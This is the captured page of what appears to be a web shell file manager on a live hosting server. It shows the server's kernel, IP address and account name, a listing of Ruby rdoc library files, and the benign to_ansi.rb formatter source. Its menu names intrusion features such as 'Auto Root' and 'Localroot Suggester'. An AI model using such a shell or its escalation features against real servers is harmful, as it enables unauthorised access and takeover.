Linux velvet.gennetworks.in 4.18.0-553.83.1.lve.el8.x86_64 #1 SMP Wed Nov 12 10:04:12 UTC 2025 x86_64
LiteSpeed
Server IP : 161.129.70.235 & Your IP : 216.73.216.5
Domains :
Cant Read [ /etc/named.conf ]
User : virtueex
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby20 /
lib64 /
ruby /
2.0.0 /
rdoc /
markup /
Delete
Unzip
Name
Size
Permission
Date
Action
attr_changer.rb
394
B
-rw-r--r--
2012-11-27 09:58
attr_span.rb
470
B
-rw-r--r--
2012-11-27 09:58
attribute_manager.rb
7.83
KB
-rw-r--r--
2012-12-17 04:37
attributes.rb
1.16
KB
-rw-r--r--
2012-11-27 09:58
blank_line.rb
361
B
-rw-r--r--
2010-12-20 08:52
block_quote.rb
222
B
-rw-r--r--
2012-11-27 09:58
document.rb
3.12
KB
-rw-r--r--
2012-12-06 03:50
formatter.rb
5.29
KB
-rw-r--r--
2012-12-17 04:37
formatter_test_case.rb
16.84
KB
-rw-r--r--
2012-11-27 09:58
hard_break.rb
416
B
-rw-r--r--
2012-11-27 09:58
heading.rb
1.17
KB
-rw-r--r--
2012-12-06 03:50
include.rb
799
B
-rw-r--r--
2012-11-27 09:58
indented_paragraph.rb
876
B
-rw-r--r--
2012-11-27 09:58
inline.rb
88
B
-rw-r--r--
2012-11-27 09:58
list.rb
1.79
KB
-rw-r--r--
2012-11-29 08:28
list_item.rb
1.68
KB
-rw-r--r--
2012-11-27 09:58
paragraph.rb
463
B
-rw-r--r--
2012-11-27 09:58
parser.rb
14.03
KB
-rw-r--r--
2012-11-30 05:04
pre_process.rb
8.14
KB
-rw-r--r--
2012-11-27 09:58
raw.rb
970
B
-rw-r--r--
2012-11-27 09:58
rule.rb
285
B
-rw-r--r--
2010-12-20 08:52
special.rb
627
B
-rw-r--r--
2012-11-27 09:58
text_formatter_test_case.rb
2.49
KB
-rw-r--r--
2012-11-27 09:58
to_ansi.rb
2.02
KB
-rw-r--r--
2012-11-27 09:58
to_bs.rb
1.67
KB
-rw-r--r--
2012-11-27 09:58
to_html.rb
8.11
KB
-rw-r--r--
2012-12-20 09:27
to_html_crossref.rb
4.17
KB
-rw-r--r--
2012-11-27 09:58
to_html_snippet.rb
5.42
KB
-rw-r--r--
2012-11-27 09:58
to_joined_paragraph.rb
1.55
KB
-rw-r--r--
2012-12-07 10:52
to_label.rb
1.77
KB
-rw-r--r--
2012-11-27 09:58
to_markdown.rb
3.55
KB
-rw-r--r--
2012-12-17 04:37
to_rdoc.rb
6.12
KB
-rw-r--r--
2012-11-27 09:58
to_table_of_contents.rb
1.65
KB
-rw-r--r--
2012-12-06 03:50
to_test.rb
1.11
KB
-rw-r--r--
2012-11-27 09:58
to_tt_only.rb
2.24
KB
-rw-r--r--
2012-11-27 09:58
verbatim.rb
1.25
KB
-rw-r--r--
2012-11-27 09:58
Save
Rename
## # Outputs RDoc markup with vibrant ANSI color! class RDoc::Markup::ToAnsi < RDoc::Markup::ToRdoc ## # Creates a new ToAnsi visitor that is ready to output vibrant ANSI color! def initialize markup = nil super @headings.clear @headings[1] = ["\e[1;32m", "\e[m"] # bold @headings[2] = ["\e[4;32m", "\e[m"] # underline @headings[3] = ["\e[32m", "\e[m"] # just green end ## # Maps attributes to ANSI sequences def init_tags add_tag :BOLD, "\e[1m", "\e[m" add_tag :TT, "\e[7m", "\e[m" add_tag :EM, "\e[4m", "\e[m" end ## # Overrides indent width to ensure output lines up correctly. def accept_list_item_end list_item width = case @list_type.last when :BULLET then 2 when :NOTE, :LABEL then if @prefix then @res << @prefix.strip @prefix = nil end @res << "\n" unless res.length == 1 2 else bullet = @list_index.last.to_s @list_index[-1] = @list_index.last.succ bullet.length + 2 end @indent -= width end ## # Adds coloring to note and label list items def accept_list_item_start list_item bullet = case @list_type.last when :BULLET then '*' when :NOTE, :LABEL then labels = Array(list_item.label).map do |label| attributes(label).strip end.join "\n" labels << ":\n" unless labels.empty? labels else @list_index.last.to_s + '.' end case @list_type.last when :NOTE, :LABEL then @indent += 2 @prefix = bullet + (' ' * @indent) else @prefix = (' ' * @indent) + bullet.ljust(bullet.length + 1) width = bullet.gsub(/\e\[[\d;]*m/, '').length + 1 @indent += width end end ## # Starts accepting with a reset screen def start_accepting super @res = ["\e[0m"] end end